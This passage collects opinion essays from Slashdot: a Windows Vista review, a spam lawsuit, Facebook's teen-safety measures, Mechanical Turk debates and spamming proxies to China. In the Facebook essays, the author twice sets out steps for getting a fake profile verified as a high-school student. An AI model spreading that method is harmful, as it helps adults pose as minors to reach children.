    and that was all my Linux for that year. Maybe I'm overdue to try it again. (Microsoft gives away their Virtual PC program that makes it easy to try other operating systems; I think it's a ploy to make us appreciate Windows more.) Now, I love the concept of a freely-distributable, freely-modifiable operating system, and I've recommended Linux to people when you need it to do something cool that Windows can't do, like bypassing Windows security by booting a PC from a CD. And it's done a lot of good for organizations like the One Laptop Per Child program, which can keep their costs down by using a free operating system. But to this day I've never heard an answer to one question: Since even Linux advocates admit that it's harder to use, what can you do with Linux that you can't do with Windows, to make it worth switching over to? If I was nervous about Vista because some of the interface had changed and some of my old programs no longer worked, it wasn't helpful to tell me to switch to a system where all of the interface would change and none of my old programs would work.

    So, I wanted to like Vista. I knew that eventually everyone would have to upgrade anyway, so, not wanting to be left behind, I wanted to switch to Vista because of the same factor that spammers use to get your attention: "Other guys are improving themselves, why aren't you?" But there were some things I ran into almost immediately:
    • Windows Explorer and Internet Explorer no longer have the "File / Edit / View" menu bars across the top of the window. Was this a big problem under XP? When the menus gave quick, two-click access to most actions that you could take within the application, was there a grassroots movement to have them removed? I did eventually find that you can hit the "Alt" key to bring the menus back, but why put people through that frustration? The most annoying feeling while using a computer is being yanked out of thinking about what you're doing with the computer to having to concentrate on how to use it.

      Perhaps the idea was to steer users towards using the buttons on the toolbar, but there aren't enough buttons to cover all the options located under the menus. If the UI designers wanted to steer users gently towards using the buttons, my suggestion would have been: Whenever the user picks something under a menu that corresponds to something accessible from the toolbar, display a dialog box which says for example, "In the future, you can print faster by clicking the printer button on the toolbar", along with a picture (and a "Do not show this message again" checkbox -- important!).

    • Windows Explorer also did away with the "Up" button that lets you browse from the current directory to the higher-level directory. Again, probably not in response to a groundswell of users demanding for that button to be removed, when it took up about one square centimeter of screen space. Supposedly Windows Explorer makes up for this by displaying the entire path to the current directory in the address bar, so that if the path is "C:\Financial Records\Chris Pirillo\ Pectoral Real Estate\", you can click on "Chris Pirillo" to go one directory higher. The trouble is that I frequently give my directories extremely long and descriptive names like (this is a real example) "Flash-Player-8.5.0.246-beta2.downloaded-2006-03-20-from-labs.macromedia.com" so that I can keep track of where and when I got each piece of downloaded software, in case I ever need to go back to a previous version that the software maker no longer makes available because they're trying to steer me away from it (ironically, "Vista syndrome"). With a directory that has a long name like that, the higher-level directories aren't visible in the address bar, so I had to locate it manually in the left-hand tree view panel. OK, knock off the violins, the point is that I didn't have to do that in XP.
    • I have an older monitor, so I wanted to turn ClearType off. The IE7 help file describes how to do this in IE, but that didn't work for me no matter how many times I tried, and my eyes were aching by the time I found out that in Vista it's a default system-wide setting that overrides IE's setting until you change the system-wide one. I would have suggested putting one line in the IE7 help file: "Note: if your operating system such as Windows Vista is set to use ClearType system-wide, you must disable this as well to disable ClearType in IE."
    • Virtual PC, which worked on all versions of Windows XP, is not supported on Vista Home Premium. I need Virtual PC (for reasons other than Linux-bashing), so this was a deal-breaker.
    • Telnet no longer installed by default. Even though I use a different telnet program for regular use, telnet.exe was handy to test whether a remote machine was reachable on a given port. (For example, in a command prompt, type "telnet www.yahoo.com 80" and when the command prompt screen goes blank, that means the machine www.yahoo.com is accepting responses on port 80, the standard port for Web traffic. Try connecting to port 81 instead, and you get no response on that port. This can be useful when diagnosing problems with Web servers and other programs.) Even though it's not hard to get telnet back, why would they go to the trouble of removing it?
    • The aforementioned Facebook problem. This seemed so startling at the time that I almost stopped everything to write an article just about that, musing on Microsoft having so much power that all PC stores were now exclusively stocking computers running an OS that, at the time anyway, couldn't access Facebook. But then I asked another bunch of users on Mechanical Turk, and all respondents using Vista said they could access Facebook after all. Of course, this wasn't a random sample, since users who bought Vista and couldn't access Facebook, probably would have returned their machines a long time ago, but I'm still not sure what caused it to work on some machines and not others -- all I know is that Facebook was inaccessible until I disabled IPv6.

      I know Facebook is reading these articles, since in November I wrote about how you could circumvent Facebook's system of verifying that users were real high school students, by doing the following: "(1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back". Shortly afterwards, Facebook changed the verification system, so that now, if you're confirming someone who is a pending member of a high school network but no one else has confirmed them yet, Facebook warns you, "Only check this box if you're absolutely sure that you know this person." So, whichever of Mark Zuckerberg's friends is reading my articles: Clever idea, and, keep the IPv6 records working.


    That was as far as I got before I stopped trying to get used to Vista and started taking notes for this article (working title: "Vist Vucked"). From the Mechanical Turk users who responded to my survey, the other most common reported problems were: software compatibility, hardware compatibility, difficulty with the UI, and running too slowly. Presumably the first two problems will improve over time, but the UI will always be hard to switch to as long as users can't find functions that were easy locatable in the old interface, and if it runs slower than XP, that will always be a factor no matter how fast your computer is. (However fast it runs Vista, you'd always be able to make it run even faster with XP instead!)

    The best things I've heard about Vista have been that (a) it is the most secure Windows ever (which Dave Barry says is like calling asparagus the "most articulate vegetable ever"), and (b) it features better multimedia integration. To which my responses were: (a) the number of incomprehensible warnings that Vista flashes at a user whenever they look at the computer funny, does not make it more secure, because users will condition themselves to just ignore those warnings, and (b) I hate watching TV on my computer anyway.

    Since TV/PC integration is a major selling point for Vista, I thought this last issue was worth looking harder at: Do people really want to use their computers to watch TV? My computer monitor is in an office where I sit up close when I'm working; but TV feels more comfortable to watch from several feet away, and in my office I can't even scoot my chair back that far. (And if I lived with family, I doubt they'd want to crowd into my office to watch a movie.) In fact, I like the psychological separation of the TV set in the living room from the distractions of the computer in the office: I go in there when I'm done with everything in here. The only way I'd regularly download and watch movies would be if I had a way to send them wirelessly to my TV, but a wireless PC-to-TV converter and the corresponding receiver together cost about $200.

    Seeking more validation of my opinions from strangers, I did another survey of 30 Mechanical Turk users, asking if they would rather drive to a movie rental store or download a movie online for the same price. Almost half (14) said they'd rather drive to the movie store, citing the comfort of watching the movie on their TV as opposed to on the computer. Another fourth of the respondents (8) said they'd download the movie but only if they could send the content to their TV to watch, and only the last fourth (8) said they'd actually watch it on their computer monitor. So the future of convergence between PC and TV will probably be not in all-in-one systems but in devices that link the PC in your study with the TV in your living room, and since there's no household name yet for PC-to-TV linkage, the field is wide open for some lucky company to make a product that becomes synonymous with the concept, the way "TiVo" is easier to say than "Digital Video Recorder". Maybe that will be a boost for systems like Vista. If that happens at about the same time that a Vista successor is released that makes the interface easier to switch to from XP, I'll bet that will be the tipping point that gets people switching voluntarily. (Of course many people will switch by then just because they need a new computer and they couldn't find one with anything but Vista on it.)

    Anyway, I was only trying a new Vista machine because the hard drive on my old computer died, but after all the data had been recovered, I just installed a new drive in the old machine and went back to XP, while my Vista machine was returned to its perch, gargoyle-like, on the shelves at Circuit City, waiting to pounce on the next unsuspecting wretch with dreams of self-improvement through newer computer purchases. The only remnant of Vista that I have left is IE7, which was installed by my Windows XP restore disk and can't be removed, and which is incompatible with some sites and programs that I need, so I've been using Firefox more and getting to like it. That's lucky, since I've already offended the loyal software-logo-wearing constituencies of Vista and Linux, and wouldn't want to deal with the Firefox crowd too. As my friend Anne Mitchell says, "Admitting you hate Firefox is almost as bad as admitting to being Republican." (Except that when Firefox screws with a page, the chat logs don't end up on national television. Ba-dump-bump!)

  47. Judge Rules That I Own Slashdot

    It · Spam · · posted by CmdrTaco · from the now-wait-a-minute dept. · 386 comments
    Bennett Haselton wrote in with this weeks amusing and shocking story of high finance, judicial discretion, and oh so much more... he writes "People still ask me if I make enough money suing spammers in Small Claims court to make it worthwhile. I say: What about the entertainment value? Recently I received an e-mail with the subject line: 'Reminder: Link exchange with your site http://slashdot.org' Finally, I thought, someone else who agrees that I'm carrying the site's entire success on my shoulders. I even hurried off to check the registration of the slashdot.org domain to see if they had made the transfer official in honor of my contributions, but apparently the domain is still being squatted by some outfit calling itself "SourceForge"." I'm shocked that a legitimate businessman would make such an error. Read on to see what Bennett does about it.

    So I returned to the e-mail, which began, "Dear Webmaster". Scrolling through it, I found the part that I was looking for (I munged the sender's URL slightly, to avoid crashing the poor guy's server from all the traffic I'm sure he's already getting):

    As you know, reciprocal linking benefits both of us by raising our search rankings and generating more traffic to both of our sites. Please post a link to my site as follows:

    Title: Work At Home Business Opportunities | Online Career Training
    URL: http://www.theeashblahblah.com/
    Description: Your Source, and Resource for starting a Home Business, or Growing the One You're In.

    Of course I am always interested in growing the business that I'm in, which is why I served him with papers a few days later under RCW 19.190, the Washington anti-spam law which prohibits e-mails with a "false or misleading subject line".

    OK, technically at this point suing spammers in Small Claims is really more of a hobby. I still think that the real future of spammer-suing is in federal court, if you can amass enough damages against a particular company to reach the threshold of $75,000 to bring a federal lawsuit. The idea is not to go after the bottom-feeders who are sending the actual spams from their Mom's basement, but to follow the money and see who is ultimately buying the leads. You can respond to mortgage spams by entering a drop-box phone number and a made-up name, waiting to see who calls you, and then telling them that the person who sold them that lead is generating them illegally and that they shouldn't buy leads from them any more. Next I'll probably try responding to some ads for pills or other shady products by using a temporary one-time-use credit card number that's only authorized up to the amount of the purchase, to see which companies are doing the sales on the back end. (The checkout forms for those pill-hawking pages rarely say the name of the company that will end up on your statement, but the charge on your card has to be from someone.) The only types of spam I can think of where "following the money" wouldn't work, would be pump-and-dump stock spams -- in that case, the beneficiary could be anyone holding stock in the company. The SEC can freeze trading in stocks that are promoted in pump-and-dump but it's still no guarantee of catching the guilty party -- even someone who buys a lot of the company might just be an "innocent" third party who knows it's a scam but hopes to cash in on the price spike (although FAQs suggest that this strategy doesn't work). But for other types of spam, it's already been well documented how you can track it to the financiers without even trying to identify the actual person who pressed "Send".

    Of course there's another reason why you'd rather be in federal court. Small Claims anti-spammer cases may not shed a lot of light on the economics behind spam, but they are instructive for what to expect if you ever appear before a District Court judge for any other reason. In this trial, heard by Judge Judith Eiler on November 5, 2007, the defendant telephoned in to the court hearing and said several times that this was a "personal e-mail from me to him" and should be exempt from the anti-spam laws. I said that I didn't think an e-mail with the subject "Link exchange with your site http://slashdot.org" could be considered "personal" since nobody who knew me would think that was my website, and in any case, personal e-mails tend not to start with "Dear Webmaster". But Judge Eiler ruled that this was a personal e-mail after all:

    "Um, spam, these are anti-spam laws, which imply that they are mail just sent out in huge bulks, which would be the antithesis of a personal e-mail. And here he puts his name, in fact this is the person that you directly sued rather than somebody that's in a corporation or a company. The court does think that there's some indication that this is a personal-type e-mail. While it may have gone out to a number of people, it doesn't have quite the earmarks."
    mp3 here

    Below is a copy of the e-mail that the judge was holding when she ruled that it "didn't have the earmarks" of a bulk e-mail:

    To: bennett@peacefire.org Subject: Reminder: Link exchange with your site http://slashdot.org X-PHP-Script: www.theeashblahblah.com/linkmachine/auto.php for 87.102.22.100 Date: Wed, 12 Sep 2007 09:34:26 -0400 From: Roderick Eash Reply-to: reash@tconl.com Message-ID: X-Priority: 3 X-Mailer: PHPMailer [version 1.72] Errors-To: reash@tconl.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="b1_b43cabef83c9f9123db7a78ef9a73362" Dear Webmaster, My name is Roderick Eash, and I run the web site Work At Home Business Opportunities | Online Career Training: http://www.theeashblahblah.com/ The other day I wrote you to let you know I'm very interested in exchanging links. I'm sending this reminder in case you didn't receive my first letter. I've gone ahead and posted a link to your site, on this page: http://www.theeashblahblah.com/linkmachine/resources/resources_home_based_business_41.html As you know, reciprocal linking benefits both of us by raising our search rankings and generating more traffic to both of our sites. Please post a link to my site as follows: Title: Work At Home Business Opportunities | Online Career Training URL: http://www.theeashblahblah.com/ Description: Your Source, and Resource for starting a Home Business, or Growing the One You're In. Once you've posted the link, let me know the URL of the page that it's on, by entering it in this form: http://www.theeashblahblah.com/linkmachine/resources/link_exchange.php?ua=_ua9&site_index=MTg4MTgwMjc%3D You can also use that form to make changes to the text of the link to your site, if you'd like. Thank you very much, Roderick Eash

    Every time I write about a spam case, I swear it's the last time. I wonder if judges read that and say to each other, "I'll bet we can get him to do it again." With this ruling, if the subject line "Link exchange with your site http://slashdot.org" is not "false or misleading", does that mean I can claim slashdot.org as my site after all?

    So I don't think that suing spammers in Small Claims will make much difference in the long run. But the odds are that you might have a case come before a Distict Court judge at some point in your life. Consider that the same type of judge who thought the message above was a "personal e-mail", might someday be deciding whether you're responsible for $10,000 in damage to someone's car, or whether there is proof beyond a reasonable doubt that you were guilty of rape, or whether you get to keep custody of your child. There's no joke here, just something I thought you should keep in mind.

    So I'm hardly a victim, but it could have been worse; I could have gotten a spam -- excuse me, a personal e-mail -- with a subject like "Your g1rl says you n3ed a b1gger m3mber". I would have been pissed if the judge had ruled that subject line was not misleading.

  48. New York's Slap to the Facebook

    Tech · Social · · posted by CmdrTaco · from the oh-no-you-didn't dept. · 157 comments
    Frequent Slashdot Contributor Bennett Haselton writes "Last month Facebook had to submit to some ritualistic lashing when New York Attorney General Cuomo accused them of misrepresenting the site's safety features and exposing minors to sexual predators -- thus making it official that "Facebook is the new MySpace". Facebook did agree to make some concessions, mainly responding faster to abuse reports. But would this make any difference, when anyone who loses their account can sign up for a new one instantly? More generally, when politicians beat up on social networking sites, what changes do they want to see made, and why do they think those changes would accomplish anything?" Hit that link below to continue to read what Bennett has to say...

    There are three questions that any politician attacking social networking sites, should have to answer, in order to be specific about what they want. First, what kind of contact do they think the social networking sites should prohibit between adults and minors? All politicians agree on prohibiting sexual solicitation, but that's a non-issue since that's already against the law. So are they asking the sites to block adults and minors from messaging each other at all? Or only "flirtatious" messages, or only requests to meet in person? Some of these answers are more ridiculous than others, but let them pick one. Second, if the site does try to monitor for inappropriate contact between adults and minors, is there any practical way to stop someone from falsely signing up as a minor? Third, if someone's account is cancelled for inappropriate behavior, what good does that do when they can just create another one? (Cuomo's office declined to respond to these questions, referring me only to their press releases. Facebook did not respond to requests for comment.)

    Complaining about the futility of Internet regulation is about as hard as complaining about media coverage of Paris Hilton. But in this case, it's not merely that the laws wouldn't do any good, it's that I can't see how the political grandstanding could even plausibly lead up to any laws, even stupid ones.

    Facebook's big concession in their settlement with Cuomo was that they would respond faster to complaints sent to abuse@facebook.com about inappropriate contact. (Previously, the AG's office had sent test complaints to the abuse@facebook.com address saying things like, "My 13 YEAR OLD received this extremely inappropriate message from a local NYC man. Please take action IMMEDIATEL!" (sic), and received no response.) But what constitutes "abuse"? Facebook's Terms of Service do not mention contact between adults and minors except to say that you may not "solicit personal information from anyone under 18" (as written, this prohibition would apply to everyone, and not just adults). Does that mean you can send flirtatious messages to an underage user as long as you don't ask for contact information (which you wouldn't need to do anyway, if it's posted on their profile and they add you to their friends list)? For that matter, does that mean if you're 18 and you ask a 17-year-old Facebook user for her phone number, you're breaking the rules? (Or, wait, this applies even if you yourself are 17 as well!) Of course there's nothing new about terms of service agreements which are vaguely written and haphazardly enforced, or playing parlor games about how the terms would be absurd if taken literally. But when a government office is threatening to bring charges and possibly push for new laws unless Facebook agrees to enforce its own Terms of Service, then it's fair game to ask exactly what rules the AG's office is asking Facebook to make people follow.

    What if Facebook blocked adults from contacting minors at all? Before, I would have assumed that Facebook would respond to this suggestion by saying that it was too draconian, that nobody had ever seriously tried to outlaw all contact between minors and adults on the Internet, etc. But Facebook's Chief Privacy Officer appeared at one point to endorse this policy as reasonable, by saying that, well, they did block adults from messaging minors on the site, even though they didn't. Cuomo's letter pointed out that any Facebook user can message any other user, and they still can. (I asked Facebook if their Chief Privacy Officer was misquoted in the article, but they didn't respond.) So leaving aside the question of whether Facebook should try to stop adults from messaging minors, would it even be possible? Of course you could block registered adult users from messaging registered underage users. But since any adult who planned on doing something suspicious would probably do it from a "throwaway" account instead of their real one, the question is whether you could screen people from creating "throwaway" accounts pretending to be minors -- sort of the opposite of adult credit-card verification for porn sites. (My suggestion: Make the person answer a question like, 'The way to impress a girl in high school is with (a) looks; (b) intelligence; (c) sense of humor; or (d) "confidence"'. From listening to most adults, you'd think they have no clue about the correct answer to this, except for the ones who also add, 'What do you mean, "in high school"?')

    Facebook's current screening system is that anyone who registers as a high school student (and if you're under 18, you have to register as a high school or college student -- homeschoolers and dropouts are out of luck unless they lie about their age), has to be confirmed by an existing student at that school, by sending them a friend request and having them confirm that you are friends. (Your account still works before you're confirmed, but you blocked from certain things that only high school accounts can do, such as browse for other members of that high school.) This is another recent change that Facebook made that was not listed in their settlement agreement -- previously, the Attorney General had documented that anybody under 18 could sign up and join a high school network, but now, you can't do this without getting another student to confirm you.

    However, this can be circumvented as well. I'm not endorsing the following trick for any mischief-making, but I think it's sufficiently obvious that there's no reason not to point it out: (1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back, which they will probably do, without even being sure if they actually know you or not. Voila, you've got your "high school student" account. Then you can presumably use that account as a foothold to approve other accounts, for example if you're a male and you want to create a fake high schooler profile as an actual guy, assuming you only want to pretend to be a teenager, not a female, because it's not like you're not some kind of weirdo.

    Facebook could conceivably require real-world verification for anyone who signed up as a minor -- confirmation from their school, for example. But this would be competitive suicide for any site whose main draw is that everybody wants to go there because everybody else is already there, so they need signups to be as easy as possible. Even if Congress passed a law draconion enough that it required all social networking sites to do this, Facebook could just re-incorporate overseas (for a billion dollars, wouldn't you move to Canada, Mark?), or else a foreign competitor could take over the teen-social-networking market by offering signups without cumbersome verifications. What would Congress do then, pass a law requiring ISPs to block access to overseas social-networking sites? They couldn't even do that with child pornography.

    Finally, if Facebook does cancel your account, you can always sign up for a new one instantly with a new e-mail address. Losing your Facebook account might be a harsh punishment for someone who had built up an extensive network of contacts around their profile. But I'll bet that any adult with a network of friends on Facebook, built around a profile that gives their real name and employer, is probably using a secondary profile with a lot less information on it if they're writing to 13-year-old girls. A dispensable secondary account like that can easily be replaced, so Facebook responding to abuse reports by closing people's accounts is just playing whack-a-mole. An arrest can stop someone permanently, but you can only arrest someone if they've actually broken the law, like sending an unambiguous sexual solicitation to an underage user.

    So there's really nothing that Facebook or any other social-networking site could do to prevent adults from signing up as minors, to prevent adults and minors from messaging each other, or to keep abusers from creating new accounts. Occasionally, they are able to make some minor concessions that a politician can take credit for -- in July, the attorney general of Connecticut alerted Facebook to three sex offenders who had profiles on the site, which Facebook duly removed. Did the sex offenders then sign up for new profiles? Are most sex offenders on Facebook smart enough not to sign up under their real names? Story doesn't say. That's one reason I could never make it as a regular reporter, because you're not allowed to insert your own voice into the story even to point out the crashingly obvious.

    But basically, the major issues that politicians keep bringing up about social networking sites, are unsolvable. For a politician, of course, this is the best of both worlds -- they can rail against social networking sites forever, knowing that the "problems" will never go away.

    This is usually the point at which the writer inserts an obligatory note that the real solution is to sit down and talk to your kids. Well, yes and no. I think first you should be as informed as possible about what the various risks are, not just for online activity but for all of life's experiences, and then sit down and talk. You could even do the research together and make a Family Fun Night out of it! (Sound of teenagers groaning and fumbling for their iPods.) For openers: one study found that in one year in the U.S., "Law enforcement at all levels made an estimated 2,577 arrests for Internet sex crimes against minors", and only 39% of those were for crimes against real, identifible minors (excluding arrests for To Catch A Predator-style sting operations). On the other hand, the National Transportation Safety Board reports that every year, about 3.4 million people are injured and 41,000 are killed in auto accidents in the U.S. Even this rough comparison would seem to suggest that until you've talked to your kid about every last detail you can think of regarding car safety, that's a better use of time than talking about Facebook. Perhaps you think it's an apples-and-oranges comparison because the sex crimes statistic counts only arrests, not actual incidents. But then the question is whether a true apples-to-apples comparison has ever been done, or how you could do one. The point is that there is some objective truth about the relative risks, and if you read even just one study comparing them, you're better informed than 90% of the people out there, including most parents. You want to be the cool Mom? You don't have to let your kids do everything, just have reasons for stuff!

    My promise to my own future kids is that I won't ever make the mistake of thinking that just because I paid for their room and board for a few years, that makes me better informed about the various risks factors of different activities. I will probably be better informed than my kids, for a long while anyway, but that won't be why. And I hope we can teach them so much that before long they'll be better informed than most people, including most of their friends' parents. Then my wife will teach them to be polite enough not to point this out to their friends' parents, but with half their genes coming from me I wouldn't bet on it.

  49. Paying People to Argue With You

    Internet · · posted by ryuzaki0 · from the comon-bennett-fists-at-dawn dept. · 397 comments
    Bennett Haselton has written in with an essay on a strange experiment on-line. He starts When you first hear about Amazon.com's "Mechanical Turk" service, which allows "requesters" to pay "Turk workers" a few pennies to complete some task which is hard to automate but easy for humans, what's the first application that comes to your mind? The system has been discussed previously on Slashdot, but I'll bet a week's wages for a Mechanical Turk worker ($1.45, according to one of them) that I was the first person who used it to pay people to write rebuttals to one of my arguments. Keep reading unless you want to fight about it.

    The interesting result was that some of the rebuttals were quite insightful, and resulted in me making changes to the argument that I would make if I had to present it again. Judging by the literacy and intelligence of some of the respondents, most of them probably wouldn't need Mechanical Turk as a source of income, so I assume most of them fit the profile of this Salon.com writer and are doing it just for fun. Hell, you can find enough people on UseNet and Slashdot who will argue with you just for free.

    But there were a few reasons I found this preferable to the conventional ways of gathering interesting rebuttals to your own reasoning. If you send out a sample argument to all of your e-mail buddies, you will probably get some useful replies, but they may start to think you're a little weird for asking them to evaluate your thought processes, especially if you do it over and over. Post an opinion on UseNet or Slashdot, and you may have to wade through a lot of crap to find the useful responses (while others may consider your post to be part of the crap that they have to wade through). And in both cases, there's the potential embarrassment of what you're asking for -- the risk of seeming so uncertain about your own opinions that you want other people to check your work for you. (I actually think that being uncertain about your own beliefs is a virtue, but it doesn't seem to be one that our culture prizes very highly.) Using Mechanical Turk addresses most of these problems; even though you're still admitting to total strangers that you might be wrong and asking them to shoot you down if they can, at least the evidence of your insecurity won't turn up when your next employer or Internet date does a Google search for your name. ("Damn it, I want a man who doesn't question his bumper stickers!")

    So, while I didn't find it useful enough that I would run every opinion through the Mechanical Turk machinery to see what feedback I could get from it (I'm not paying a bunch of them to proofread this article), I did like enough to recommend it to people for certain arguments in certain settings. The main kinds of arguments that I would try out on the Mechanical Turk service would be about abstract philosophical or moral questions on issues that have been around forever, like abortion or the death penalty -- topics so explosive that you'd risk making your friends very uncomfortable if you test-marketed your arguments on them, and which would seem almost rude to post about in a public forum because the debate topics have been around for so very, very long. But on Mechanical Turk, $1 is apparently enough to get people to ignore the awkwardness and the exhaustedness of the topic and to focus on what you ask.

    And what was the argument that I used to test it out? Perhaps the geek crowd will feel more sympathy with this than the general public does. Basically it was that the conventional wisdom behind allowing adults to smoke, but banning cigarettes for people under 18, is wrong. Either you can believe that smoking should be permitted for everybody, or that it should be banned for everybody, but there is no consistent set of assumptions that could lead you to conclude that smoking should be banned for people under 18 but allowed for everyone else. You have two groups of people under consideration -- people under 18 who smoke, and people over 18 who smoke. What possible reason could there be for wanting to protect the health of the people in the first group, but not the people in the second group?

    The problem with the conventional reason for smoking age restrictions -- "Younger people have worse judgment, so they are more likely to smoke" -- is that if this is true, all that means is that the first group of people will be proportionally larger, relative to the total population of people in their age range. But even after that assumption, you're still left with two groups of people, who exhibit the same continued bad judgment with regard to smoking cigarettes. Treating the two groups differently, is a bit like saying we should have lighter sentences for female murderers than for male murderers, just because men are more likely to commit murder.

    And yet this conclusion did give me pause, so this is a classic example of an argument where you'd want someone to check your work. Off I went to create a Human Intelligence Task (HIT) on Mechanical Turk simply asking people to read the argument and respond. In the first round, most responders missed what I thought was the point of the argument, and responded with some variation of "Minors are more likely to smoke because they have worse judgment", without addressing the question of why the two groups of smokers should be treated differently. A few people responded with variations of "We've always done it that way" (referring to similar restrictions on alcohol, pornography, etc.); fair enough, it just reminded me that if I asked the question again I'd have to say I didn't consider any argument valid that boiled down to "We've always done it that way".

    But then came some more interesting responses. One worker replied that I was wrong to assume that the effects of a cigarette were "the same" on adults and minors because cigarette smoke has been shown to be more damaging to developing tissues. OK, that was worth a dollar. On the other hand, that just means that there is some number N cigarettes that would be just as harmful to an adult, as 1 cigarette would be to a minor, so you're still left without a consistent reason for why you'd let the adult buy those N cigarettes but prevent the minor from buying 1 cigarette. Then another user called me out on the opening line of my original argument, "There is no reason to ban cigarettes for minors but not for adults." He said, quite correctly, that I had only attempted to debunk the most commonly given reason, but it was wrong to conclude that there was no such reason.

    So, this led me to another idea for how to present an argument and solicit feedback on Mechanical Turk: in the form of a series of mathematically precise statements, each one following from the previous ones. The new HIT was to ask users if they disagreed with the conclusion, and if they disagreed, then to identify the first statement that they disagreed with. The idea was that each statement would follow logically from the ones before it, so identifying any statement as the "first" one that they disagreed with, would be tantamount to a self-contradictory paradox.

    Now, whether or not you want to use this format when running an argument past the Turk workers, depends on what your goal is. If you want to really find out if your own argument is valid, then breaking it down mathematically is one approach. On the other hand, if you already believe your own argument, and you're just trying to find the most persuasive way of phrasing it, then you may not learn anything useful by breaking it down into a series of mathematical steps, because that's probably not going to be the format of our final persuasive essay.

    Anyway, the new mathematical format of the argument was (slightly reworked from what I posted on Amazon):

    1. Government should ban smoking by people under 18, because of the harmful health effects.
    2. If that's true for the entire group of underage smokers, then it's also true for each individual smoker under 18. In other words, even if only one person under 18 smoked in the entire country, it would still be justified for the government to ban them from smoking.
    3. Whatever bad health effects are caused by the average person under 18 smoking 1 cigarette, there is some number N cigarettes that would cause the same bad health effects in the average adult who smoked them.
    4. If banning 1 person under 18 from smoking 1 cigarette is justified (even if they were the last smoker on Earth), and the health effects would be the same for an average adult who smoked N cigarettes, then banning 1 adult from smoking those N cigarettes would also be justified (again, even if they were the last smoker on Earth).
    5. If banning 1 person over 18 from smoking would be justified, then the same logic would apply to every person over 18, which would imply banning smoking for all people over 18.
    6. Hence, if you believe that smoking should be banned for people under 18, then the same logic would lead to a ban on smoking for people over 18 as well.

    The response from a lot of workers who responded to this HIT was that... I lost them. Each of them identified the first statement in the list that they disagreed with, as required by the HIT, but many commented that the whole thing was phrased confusingly. There was no clear winner for the first statement that people disagreed with, but several people picked #3 and #4, arguing some version of "People under 18 have less developed judgment." (I still say that doesn't matter, because you're talking about comparing a person under 18 who smokes, with a person over 18 who smokes, and their judgment in both cases is the same, etc.) So this particular experiment failed -- it didn't make it easier to persuade people by formulating the argument as a series of steps, and it also didn't lead to any agreement on what was the Achilles' Heel of the argument itself.

    However I think the general idea, of using Mechanical Turk to find sparring partners, may be useful to a lot of people. If you were interested in publishing some kind of persuasive argument, you could use an Amazon HIT to have readers compare several different versions of the same argument and identify the one that they thought was most convincing. If you were feeling more philosophical and simply wanted to know if your argument was correct, you could pay people to look for flaws in it (and here is where the mathematical phrasing could come in handy). If you're crafting an argument for public consumption, you could even have HIT workers build up your argument for you -- start with a position and have them come up with reasons supporting that position -- although to me that feels like a cheapening of the debate process that crosses the line, because you're not even trying to reason your way to a conclusion, instead starting with the conclusion you want and then working backwards (not that this isn't what a lot of debaters do anyway!). My own interest would be to see next if certain types of arguments are more likely to persuade people who are more mathematically inclined (by asking respondents to indicate how well they did at math in school). Perhaps arguments with flowery language are more likely to appeal to people who were English majors, while arguments spelled out as a series of logical steps are more likely to appeal to people who look at things in a mathematical way (also known as the "real" or "right" way of looking at things).

    Maybe my preference for the controlled, user-reimbursed process of "debating" that is enabled by Mechanical Turk, has to do with a lifelong focus on bottom-line results: Decide what the result is, and judge the process by how well it brings about that result. I don't think debate and discussion should be like soccer, valued for the fun and the exercise; I think a good debate should actually get somewhere, persuading the participants or the listeners of a new point of view that builds on their old one, or else the debate has failed. If paying HIT workers kills the "spirit" of a good debate but helps achieve the goal, then so much the better. On the other hand, we'll never run out of people who enjoy the process of debating and arguing for its own sake, and will continue to debate things into the ground without anybody paying them. Hey look, here come some of them now!...

  50. Should We Spam Proxies to China?

    Yro · Censorship · · posted by CmdrTaco · from the or-just-viagra-ads dept. · 282 comments
    Frequent Slashdot Contributor Bennett Haselton is back with a story about fighting censorship with spam. He starts "Is it OK to send unsolicited e-mail to users in China, Iran, and other censored countries, telling them about new proxy sites for getting around Internet censorship? I hasten to add that I have NOT done this, am not planning on doing it and would not have any idea how to go about it anyway. Between the various companies that offer proxy services, I don't know of anyone who is doing it (no, not even people who swore me to secrecy about it). But I think the question involves ethical issues that would not apply to most discussions of spam." Hit that big link below to read the rest of his words.

    Lest there be any doubt, I hate spam, getting about 10,000 of them a week with no way to filter them without blocking at least some of my important mail as well; I've tried suing some spammers mostly without success, and humbly proposed one anti-spam algorithm which caught on like wildfire, if the wildfire were spreading through a... rainforest, in the... rain. But I am not against spam a priori (Latin for "unless they are telling me I need to add extra inches"), I'm against spam because that follows from other principles, and in some situations there is some question as to whether those principles still apply. (It is not as simplistic as saying that it is OK to spam "for the greater good". Stay with me!)

    Getting back to basics: Why is spam a problem? Because the cost of receiving a message, however minor, is more than the benefits, which are usually microscopic considering the probability that a typical recipient would buy what they're selling. Take a small cost that exceeds a small benefit, multiply by millions of messages per day, and the cost exceeds the benefit by about $70 billion per year.

    But, just as a thought experiment, could you conceive of a kind of spam that would not be a nuisance? Suppose you sent an e-mail to millions of people offering them free $20 bills. And you actually followed through and sent the money to anybody who claimed the offer. Then the conventional argument against spam no longer applies, because the e-mails are benefitting people more than they're costing them. It's hard to think of any real-life examples, but if you had sent out mass e-mails telling people about the refund checks for anybody who had bought a CD (it was real, I got my $13.86 in the mail in 2004), I probably wouldn't have come to your house to egg your windows.

    "Aha!" some spammer is thinking, "my product does benefit people more than the e-mail costs them! I can help them refinance their homes at a low rate, to take out money they can multiply many times with my new stock tip, and then spend at my friend Tiffanee's new site to help pay her way towards her physics degree!" Wait. Let's just say that you're offering some miracle product at a low price, conferring some huge benefit on each person who buys it. The only costs of spreading your bounty to the world, are whatever advertising costs are incurred in getting the word out. But if your product is really the miracle you say it is, then the benefits to people (even after subtracting the price they paid for it), exceed the costs of the advertising.

    Then you have several choices. You can spam to advertise the product. In this case, the costs of the advertising are passed on to unwilling recipients. But if the benefits your product confers are greater than the cost of getting people's attention, then you've still arguably done more good than harm to the world, even if the net effect on some individual people was harmful (on annoyed recipients who didn't end up buying your product). By forcing the advertising costs on other people, you've saved that much more money; you can pocket that benefit yourself, or if you pass on the savings in the form of reduced prices (which you may have to do in a competitive market anyway), you've basically transferred that much benefit by stealing it from the spam recipients and distributing it to your customers. So the main benefit to the world was the wonderfulness of your product, and on top of that, you stole some small benefit from a large number of people and redistributed it to other people, which has no positive or negative net effect.

